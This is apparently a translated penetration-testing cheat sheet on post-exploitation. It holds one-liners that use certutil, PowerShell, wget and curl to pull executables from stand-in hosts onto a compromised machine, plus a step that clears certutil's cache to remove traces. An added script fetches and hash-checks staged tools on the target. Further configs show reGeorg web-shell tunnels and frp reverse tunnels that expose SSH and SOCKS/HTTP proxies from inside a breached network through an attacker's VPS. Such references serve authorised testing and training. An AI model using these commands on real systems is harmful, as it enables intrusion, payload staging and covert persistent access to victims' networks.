Commonly used commands in penetration testing
0x01 Information gathering
1. Search engines
0x00 Post-exploitation
1. Uploading and downloading files
certutil.exe -urlcache -split -f http://xxx.com/a.php a.php
Explanation: download a.php with certutil; the optional last argument sets the output name. certutil keeps a copy in its URL cache, remove it afterwards with certutil -urlcache http://xxx.com/a.php delete
powershell "(New-Object System.Net.WebClient).DownloadFile('http://example.com/a.exe','a.exe')"
powershell -c "Invoke-WebRequest -Uri 'http://example.com/a.exe' -OutFile 'C:\Windows\Temp\a.exe'"
scp [local_file_path] username@[ip]:/[remote_file_path]
Explanation: copy a local file to the remote host over SSH; swap the two arguments to pull a file from it instead
wget https://xxx.com/1.exe -O 1.exe --limit-rate=500k
Explanation: download 1.exe with the transfer rate capped at 500 KB/s and save it as 1.exe
curl http://xxx.com/1.exe -O
Explanation: download 1.exe and save it under the same name it has on the server
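The one-liners above only move bytes; nothing confirms that the binary that arrived on the target is the one you staged. The script below is an added example, not part of the original page: it picks whichever downloader the Linux host has (curl or wget, throttled like the wget line above), then keeps the file only if its SHA-256 matches the value you recorded before upload. Function names, the file:// shortcut for tools staged on a mounted share, and the default rate are all assumptions made for the example.

```shell
#!/bin/sh
# Added example (not from the original page): fetch a tool with whichever
# downloader exists, rate-limited, and refuse to keep it unless its SHA-256
# matches the value recorded on the attacker side. All names are hypothetical.

# fetch_file URL OUT [RATE]  -- download URL to OUT, throttled to RATE (default 500k).
# file:// URLs are copied directly, which covers a tool staged on a mounted share.
fetch_file() {
    url=$1; out=$2; rate=${3:-500k}
    case $url in
        file://*) cp "${url#file://}" "$out" ;;
        *)
            if command -v curl >/dev/null 2>&1; then
                curl -fsSL --limit-rate "$rate" -o "$out" "$url"
            elif command -v wget >/dev/null 2>&1; then
                wget -q --limit-rate="$rate" -O "$out" "$url"
            else
                echo "fetch_file: neither curl nor wget available" >&2
                return 2
            fi ;;
    esac
}

# sha256_of FILE  -- print the lowercase hex SHA-256 of FILE
# (GNU coreutils sha256sum, or the perl-based shasum found on BSD/macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_file FILE EXPECTED  -- succeed only if FILE hashes to EXPECTED.
verify_file() {
    [ "$(sha256_of "$1")" = "$2" ]
}

# fetch_and_verify URL OUT EXPECTED [RATE]  -- download, check the hash, and
# delete the file on mismatch so a tampered or truncated binary is never left
# on disk for the next person to find or run.
fetch_and_verify() {
    url=$1; out=$2; expected=$3; rate=$4
    fetch_file "$url" "$out" "$rate" || return $?
    if verify_file "$out" "$expected"; then
        return 0
    fi
    rm -f "$out"
    echo "fetch_and_verify: SHA-256 mismatch for $out, file removed" >&2
    return 3
}
```

Record the hash on the attacking machine with sha256sum before uploading the tool, then call fetch_and_verify with that value on the target; a non-zero exit means the file was not kept.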
2. Proxies
Applicable when the target has no outbound connectivity: the compromised web server itself acts as the proxy
neo-reGeorg: https://github.com/L-codes/Neo-reGeorg
reGeorg: https://github.com/sensepost/reGeorg
Upload the tunnel script to the web server
Connect to it with Python 2 to start the local SOCKS listener (reGeorg needs Python 2; Neo-reGeorg also supports Python 3)
Configure Proxifier to send traffic through that local SOCKS port
Applicable when the target has outbound connectivity, or for machines behind a firewall: reverse tunnel with frp
- Public VPS configuration
# frps.ini default configuration
[common]
bind_port = 7000
# vhost_http_port and vhost_https_port must also be set here before the
# [http] and [https] sections of frpc.ini below will work, for example:
# vhost_http_port = 8080
# vhost_https_port = 8443
- Run the server in the background
nohup ./frps -c ./frps.ini >/dev/null &
- Target machine configuration
# frpc.ini configuration file
[common]
server_addr = x.x.x.x
server_port = 7000
[http]
type = http
local_port = 80
custom_domains = mzcc_domain.com
[https]
type = https
local_port = 443
custom_domains = mzcc_domain2.com
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
# Using the socks5 plugin
[socks]
type = tcp
remote_port = 6789
plugin = socks5
plugin_user = admin
plugin_passwd = password
# Using the http_proxy plugin
# Each section needs its own remote_port; two sections bound to the same
# port on frps will not both come up
[http_proxy]
type = tcp
remote_port = 6790
plugin = http_proxy
plugin_http_user = admin
plugin_http_passwd = password
# Both plugins publish a proxy into the target network on the public VPS, so
# replace the placeholder credentials before deploying
- Run the client in the background
nohup ./frpc -c ./frpc.ini >/dev/null &
- Screenshot of the actual configuration (image not included in this copy)
3. Privilege escalation
This article was compiled by nemu1k5ma; please credit the source when reposting~